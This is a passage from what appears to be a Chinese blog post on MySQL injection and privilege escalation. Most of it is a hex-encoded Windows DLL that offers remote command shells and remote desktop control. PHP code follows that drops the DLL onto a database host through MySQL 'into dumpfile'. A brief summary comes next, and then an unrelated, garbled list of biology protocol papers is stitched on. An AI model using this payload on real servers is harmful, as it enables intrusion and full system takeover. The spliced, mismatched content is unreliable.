6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D6520202020202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F666600007175657279000000766965770000000064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E67732E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F7253696E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D627369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D0490010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,CHAR))');
if (mysql_errno($conn) != 0) {
echo mysql_error().'<br/>';
mysql_close($conn);
exit();
}
mysql_query('select c from udftmp into dumpfile "'.$path.'"');
if (mysql_errno($conn) != 0) {
echo mysql_error(). '<br/>';
mysql_query('drop table udftmp');
mysql_close($conn);
exit();
}
mysql_query('drop table udftmp');
if (mysql_errno($conn) !=0)
echo 'Dump DLL Failed.'.mysql_error();
else
echo 'Dump DLL Success!';
mysql_close($conn);
}
?>
</body>
</html>
|
總結
注入產生原因就是對用戶輸入的數據未進行嚴格校驗���,導致可以構造惡意語句。
本篇文章僅僅介紹MYSQL的基礎���。
- 本文作者: oudeniu
- 本文鏈接: https://butnomingzi.github.io/posts/c118d50/
- 版權聲明: 本博客所有文章除特別聲明外�,均采用 BY-NC-SA 許可協議�。轉載請注明出處�!
總結 漏洞 MYSQL
PowerShell免殺工具 xencrypt
Python Scapy小工具
- 1. MySQL安裝及配置1.1. Mysql安裝(這里版本為8.0.17)1.2. 登陸MySQL及配置密碼1.3. MySQL命令學習1.4. Mysql系統表利用
- 2. MySQL注入基礎
- 3. MySQL提權
目 錄
● A Modified Acyl-RAC Method of Isolating Retinal Palmitoyl Proteome for Subsequent Detection through LC-MS/MS
一種改良的?����;?RAC方法分離視網膜棕櫚酰蛋白質組,并通過LC-MS/MS進行后續檢測
作者:Sree I Motipally、Boyden Myers、Emily R Sechrest����、David Sokolov、Joseph Murphy、Saravanan Kolandaivelu
原文鏈接:https://s.bio-protocol.org/d658437b420f3a23
● Synthetic Promoter Screening Using Poplar Mesophyll Protoplast Transformation
用楊樹葉肉原生質體轉化進行合成啟動子篩選
作者:Yongil Yang���、Yuanhua Shao���、Timothy A. Chaffin����、Amir H. Ahkami、Eduardo Blumwald、C. Neal Stewart Jr.
原文鏈接:https://s.bio-protocol.org/70b5752794316ddb
● In vitro Reconstitution of Phase-separated p62 Bodies on the Arp2/3-derived Actin Network
相分離的p62體在Arp2/3衍生的肌動蛋白網絡上的體外重組
作者:Tong Liu�����、Mengbo Xu����、Na Mi
原文鏈接:https://s.bio-protocol.org/c31f5361dde817ed
● Analysis of RNA Polymerase II Chromatin Binding by Flow Cytometry
用流式細胞儀分析RNA聚合酶II的染色質結合情況
作者:Lilli T. E. Bay�、Trond Stokke、Randi G. Sylju?sen��、Helga B. Landsverk
原文鏈接:https://s.bio-protocol.org/6a50db06ed83a9ca
● Visualizing the Cisternal Organization of Golgi Ministacks in HeLa Cells by Side-averaging
通過側向平均方法來可視化HeLa細胞中高爾基Ministacks的池狀組織
作者:Divyanshu Mahajan、Hieng Chiong Tie����、Lei Lu
原文鏈接:https://s.bio-protocol.org/6c29dcce11597912
● Anti-tumor Efficacy of CD19 CAR-T in a Raji B Cell Xenografted Mouse Model
CD19 CAR-T在Raji B細胞異位移植小鼠模型中的抗腫瘤效果
作者:Qian Xiao����、Xiaolei Su
原文鏈接:https://s.bio-protocol.org/a08af0644b87425b
● Development of a Gene Replacement Method for the Filamentous Bacterium Leptothrix cholodnii SP-6
絲狀菌 Leptothrix cholodnii SP-6的基因替換方法的開發
作者:Tatsuki Kunoh、Erika Ono�、Tatsuya Yamamoto�����、Ichiro Suzuki���、Minoru Takeda��、Nobuhiko Nomura
原文鏈接:https://s.bio-protocol.org/187bdead0b7f1f32
● A Quick DNA Extraction Method for High Throughput Screening in Gram-positive Bacteria
一種用于革蘭氏陽性細菌高通量篩選的快速DNA提取方法
作者:Nuo Chen���、Xiaoming Yuan
原文鏈接:https://s.bio-protocol.org/c054efe082d5e888
● Application of a Spacer-nick Gene-targeting Approach to Repair Disease-causing Mutations with Increased Safety
應用 "間隔符 "基因定向方法以修復致病突變并提高安全性
作者:Ngoc Tung Tran�����、Mikhail Lebedin���、Eric Danner�、Ralf Kühn��、Klaus Rajewsky���、Van Trung Chu
原文鏈接:https://s.bio-protocol.org/996b903632b0f6ce
● Establishing Bipotential Human Lung Organoid Culture System and Differentiation to Generate Mature Alveolar and Airway Organoids
建立雙潛能的人肺類器官培養系統及分化產生成熟的肺泡和氣道類器官
作者:Man Chun Chiu���、Cun Li�、Yifei Yu����、Xiaojuan Liu、Jingjing Huang�、Zhixin Wan�����、Kwok Yung Yuen��、Jie Zhou
原文鏈接:https://s.bio-protocol.org/80a1aabe8a8d6c81
Bio-protocol 簡介
Bio-protocol于2011年在斯坦福大學創建, 致力于搭建全球權威的�、高質量的生物實驗方案分享平臺�����,以助力科學發現��。Bio-protocol期刊是Bio-protocol旗下的一份同行評審的國際學術期刊,發表高質量的生命科學實驗方案,旨在提高科研的可重復性�。至今�,Bio-protocol已發表了來自全球上萬名優秀科研工作者(包括多名諾貝爾獎獲得者)的5000多篇實驗方案��,并且同 Science�、eLife等12家國際權威科學雜志建立長期合作關系����,共同促進生命科學研究的可重復性。2019年Bio-protocol期刊已被PubMed Central,ESCI收錄。
